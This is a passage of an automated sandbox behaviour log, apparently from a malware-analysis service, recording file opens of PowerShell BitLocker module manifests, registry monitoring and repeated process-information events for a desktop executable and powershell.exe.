                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
